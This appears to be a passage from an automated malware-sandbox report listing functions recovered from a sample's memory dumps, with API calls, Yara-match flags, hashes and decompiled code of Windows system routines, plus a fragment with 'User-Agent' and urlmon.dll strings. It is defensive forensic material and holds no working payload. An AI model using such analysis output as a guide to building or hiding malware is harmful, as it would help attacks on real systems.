                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020AFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0009A052, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                    • Instruction ID: f9435cd92bba46a372c1278d5618214d5be645425fc5aed6f4f888788f9bae5c
                    • Opcode Fuzzy Hash: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                    • Instruction Fuzzy Hash: 83E0D8B85003455FDB14EE78D5D24673B85FF812607509A8AEC5947643C164C91987A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0009A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(000944F6,?,?,oL,?,000944F6,?,?,?,?,?,00000000,00000000,?), ref: 0009A04D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: oL
                    • API String ID: 1279760036-2581261730
                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction ID: fb531f36ecf60f8f990f8beeb336912dc4c8dd0bca289f823f6bbc923f289a64
                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction Fuzzy Hash: E3E012B1200208ABDB14EF99CC41EA777ACAF88650F118558BE185B242C630F9108AF0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0009A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction ID: a291e4ec65558c5148eedba6729c149e861a9d856c25b40a8d06025144360991
                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction Fuzzy Hash: 25E012B1200208ABDB18EF99CC49EA777ACAF88750F018558BE185B242C630E9108AF0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0009A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A124
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction ID: be69a164b90f52cdf138f11d4f4c16ae0c8f1d3ca4b73922774bedb9ce3d57f5
                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction Fuzzy Hash: 7E01B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0009A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F192,0008F192,?,00000000,?,?), ref: 0009A1F0
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction ID: 89bb538c540c149beddcab492b13c1476a756bae682638512484373e91ae5804
                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction Fuzzy Hash: B2E01AB16002086BDB10DF49CC85EE737ADAF89650F018154BE0C57242C930E8108BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00097295, Relevance: 6.3, Strings: 5, Instructions: 80COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Us$: $er-A$gent$urlmon.dll
                    • API String ID: 0-1367105278
                    • Opcode ID: 322ff36b181f73603f449628b60f3b565e0af28169e45aa51266f965256259f0
                    • Instruction ID: ccf50836fcc1ff978268807161ccbe3faaba2a6763f570eb8ff4a1dee30e4c08
                    • Opcode Fuzzy Hash: 322ff36b181f73603f449628b60f3b565e0af28169e45aa51266f965256259f0
                    • Instruction Fuzzy Hash: 9E116A73E0920996EF109F90AC02BFEBBA4EF51714F104155EC0C6B242D2799A0297D6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 000972A5, Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                    • Instruction ID: fa881e5a02d0fe28abbbd56ef8c28420443e8f6a36599efb038af9d014cd9b8a
                    • Opcode Fuzzy Hash: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                    • Instruction Fuzzy Hash: E7E06837E5A1508A6F14AEA9B4051EAFF60EB9B2607547296CC0C6B207C522D811DAC6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020D8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E020D8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E020D8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E020BE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E020D718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E020D8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E020D718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E020D8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E020D8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E020D8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E020D718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E020B2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E020CE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E020BE2A8(_t322,  &_v68, _v16);
								if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E020CE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E020BE2A8(_t322,  &_v68, _t236);
								if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E020D718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E020B2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E020CE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E020BE2A8(_v12,  &_v68, _v16);
							if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E020CE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E020BE2A8(_t322,  &_v68, _t269);
							if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E020D718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E020B2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E020CE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E020BE2A8(_v12,  &_v68, _v16);
						if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E020CE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E020BE2A8(_t322,  &_v68, _t296);
						if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                    0x020d8788
                    0x020d8788
                    0x020d8791
                    0x020d8794
                    0x020d8798
                    0x020d879b
                    0x020d879e
                    0x020d87a1
                    0x020d87a4
                    0x020d87a7
                    0x020d87aa
                    0x020d87af
                    0x02121ad3
                    0x020d8b0a
                    0x020d8b0d
                    0x020d8b13
                    0x020d8b19
                    0x020d8b1f
                    0x020d8b25
                    0x020d8b2b
                    0x020d8b31
                    0x020d8b37
                    0x020d8b3d
                    0x020d8b46
                    0x020d8b46
                    0x020d87c6
                    0x020d87d0
                    0x02121ae0
                    0x02121ae6
                    0x02121af8
                    0x02121af8
                    0x02121afd
                    0x02121afe
                    0x02121b01
                    0x02121b06
                    0x02121b06
                    0x020d87d6
                    0x020d87f2
                    0x020d87f7
                    0x020d8807
                    0x020d880a
                    0x020d880f
                    0x020d8810
                    0x020d8813
                    0x020d8818
                    0x020d8818
                    0x020d882c
                    0x020d8831
                    0x020d8838
                    0x020d8908
                    0x020d8920
                    0x020d89f0
                    0x020d8a08
                    0x020d8af6
                    0x020d8af6
                    0x020d8af8
                    0x020d8afb
                    0x02121beb
                    0x02121beb
                    0x020d8b04
                    0x02121bf8
                    0x02121c0e
                    0x02121c13
                    0x02121c16
                    0x02121c16
                    0x02121bf8
                    0x00000000
                    0x020d8b04
                    0x020d8a0e
                    0x020d8a11
                    0x020d8a14
                    0x020d8a15
                    0x020d8a18
                    0x020d8a22
                    0x020d8b59
                    0x020d8a28
                    0x020d8a3c
                    0x020d8a3c
                    0x020d8a42
                    0x02121bb0
                    0x02121b11
                    0x02121b11
                    0x00000000
                    0x020d8a48
                    0x020d8a51
                    0x020d8a5b
                    0x020d8a5e
                    0x020d8a61
                    0x020d8a69
                    0x020d8a69
                    0x020d8a6d
                    0x00000000
                    0x00000000
                    0x020d8a74
                    0x020d8a7c
                    0x020d8a7d
                    0x020d8a91
                    0x020d8a93
                    0x020d8a93
                    0x020d8a98
                    0x020d8a9b
                    0x020d8aa1
                    0x020d8aa1
                    0x020d8aa4
                    0x020d8aaa
                    0x020d8ab1
                    0x020d8ac5
                    0x020d8ac7
                    0x020d8ac7
                    0x020d8ac5
                    0x020d8ace
                    0x02121bc9
                    0x02121bce
                    0x02121bd2
                    0x02121bd2
                    0x020d8ad8
                    0x020d8aeb
                    0x020d8aeb
                    0x020d8af0
                    0x020d8af4
                    0x00000000
                    0x020d8af4
                    0x020d8a42
                    0x020d8926
                    0x020d8929
                    0x020d892c
                    0x020d892d
                    0x020d8930
                    0x020d8935
                    0x020d893a
                    0x020d8b51
                    0x020d8940
                    0x020d8954
                    0x020d8954
                    0x020d895a
                    0x02121b63
                    0x00000000
                    0x020d8960
                    0x020d8969
                    0x020d8973
                    0x020d8976
                    0x020d8979
                    0x020d897e
                    0x020d8981
                    0x020d8981
                    0x020d8986
                    0x00000000
                    0x00000000
                    0x02121b6e
                    0x02121b74
                    0x02121b7b
                    0x02121b8f
                    0x02121b91
                    0x02121b91
                    0x02121b99
                    0x02121b9c
                    0x02121ba2
                    0x02121ba2
                    0x020d898c
                    0x020d8992
                    0x020d8999
                    0x020d89ad
                    0x02121ba8
                    0x02121ba8
                    0x020d89ad
                    0x020d89b6
                    0x020d89c8
                    0x020d89cd
                    0x020d89d0
                    0x020d89d0
                    0x020d89d6
                    0x020d89e8
                    0x020d89e8
                    0x020d89ed
                    0x00000000
                    0x020d89ed
                    0x020d895a
                    0x020d883e
                    0x020d8841
                    0x020d8844
                    0x020d8845
                    0x020d8848
                    0x020d884d
                    0x020d8852
                    0x020d8b49
                    0x020d8858
                    0x020d886c
                    0x020d886c
                    0x020d8872
                    0x02121b0e
                    0x00000000
                    0x020d8878
                    0x020d8881
                    0x020d888b
                    0x020d888e
                    0x020d8891
                    0x020d8896
                    0x020d8899
                    0x020d8899
                    0x020d889e
                    0x00000000
                    0x00000000
                    0x02121b21
                    0x02121b27
                    0x02121b2e
                    0x02121b42
                    0x02121b44
                    0x02121b44
                    0x02121b4c
                    0x02121b4f
                    0x02121b55
                    0x02121b55
                    0x020d88a4
                    0x020d88aa
                    0x020d88b1
                    0x020d88c5
                    0x02121b5b
                    0x02121b5b
                    0x020d88c5
                    0x020d88ce
                    0x020d88e0
                    0x020d88e5
                    0x020d88e8
                    0x020d88e8
                    0x020d88ee
                    0x020d8900
                    0x020d8900
                    0x020d8905
                    0x00000000
                    0x020d8905

                    APIs
                    Strings
                    • Kernel-MUI-Language-Disallowed, xrefs: 020D8914
                    • Kernel-MUI-Number-Allowed, xrefs: 020D87E6
                    • WindowsExcludedProcs, xrefs: 020D87C1
                    • Kernel-MUI-Language-SKU, xrefs: 020D89FC
                    • Kernel-MUI-Language-Allowed, xrefs: 020D8827
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: _wcspbrk
                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                    • API String ID: 402402107-258546922
                    • Opcode ID: e7ae6d9eebe04eabb924efe5d8851a8cac3170d65592820389afeef4e25e2c4d
                    • Instruction ID: 7ee43e095a27845c9f1bc5acb915da57a90125981b7c2830322865d4a4abc739
                    • Opcode Fuzzy Hash: e7ae6d9eebe04eabb924efe5d8851a8cac3170d65592820389afeef4e25e2c4d
                    • Instruction Fuzzy Hash: 27F1E6B1D01309EFDB62DF98C9849EEBBB9FF08304F14846AE505A7211E7359A45EF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020F13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                    Download Yara Rule
                    C-Code - Quality: 38%
                    			E020F13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E020E7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x20b2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E020E7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x20b9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E020E7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E020E7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E020E7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E020E7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                    0x020f13d5
                    0x020f13d9
                    0x020f13dc
                    0x020f13de
                    0x020f13e1
                    0x020f13e8
                    0x020f13ee
                    0x0211e8fd
                    0x00000000
                    0x0211e921
                    0x0211e921
                    0x0211e928
                    0x0211e982
                    0x0211e98a
                    0x00000000
                    0x0211e99a
                    0x0211e99e
                    0x0211e9a3
                    0x0211e9a8
                    0x0211e9b9
                    0x0211e978
                    0x00000000
                    0x0211e978
                    0x0211e98a
                    0x0211e92a
                    0x0211e931
                    0x0211e944
                    0x0211e944
                    0x0211e950
                    0x0211e954
                    0x0211e959
                    0x0211e95e
                    0x0211e963
                    0x0211e970
                    0x00000000
                    0x0211e975
                    0x0211e93b
                    0x0211e980
                    0x00000000
                    0x0211e980
                    0x0211e942
                    0x0211e94b
                    0x00000000
                    0x0211e94b
                    0x00000000
                    0x0211e942
                    0x020f13f4
                    0x020f13f4
                    0x020f13f9
                    0x020f13fc
                    0x020f13ff
                    0x020f1406
                    0x0211e9cc
                    0x0211e9d2
                    0x0211e9d2
                    0x0211e9cc
                    0x020f140c
                    0x020f1411
                    0x020f1431
                    0x020f143a
                    0x020f143c
                    0x020f143f
                    0x020f143f
                    0x020f1442
                    0x020f1447
                    0x020f14a8
                    0x020f14ac
                    0x0211e9e2
                    0x0211e9e7
                    0x0211e9ec
                    0x0211ea05
                    0x0211ea05
                    0x00000000
                    0x020f1449
                    0x00000000
                    0x020f1449
                    0x020f144c
                    0x020f1459
                    0x020f1462
                    0x020f1469
                    0x020f146a
                    0x020f1470
                    0x020f1473
                    0x020f1476
                    0x020f1476
                    0x020f1490
                    0x020f1495
                    0x020f138e
                    0x020f1390
                    0x020f1397
                    0x020f1398
                    0x020f1399
                    0x020f13a1
                    0x020f13a4
                    0x020f13a4
                    0x020f1498
                    0x020f149c
                    0x020f149f
                    0x020f14a2
                    0x00000000
                    0x00000000
                    0x020f14a4
                    0x00000000
                    0x020f14a4
                    0x020f1413
                    0x020f1415
                    0x020f1416
                    0x020f1419
                    0x020f141c
                    0x020f1422
                    0x020f13b7
                    0x020f13bc
                    0x020f13bf
                    0x020f13bf
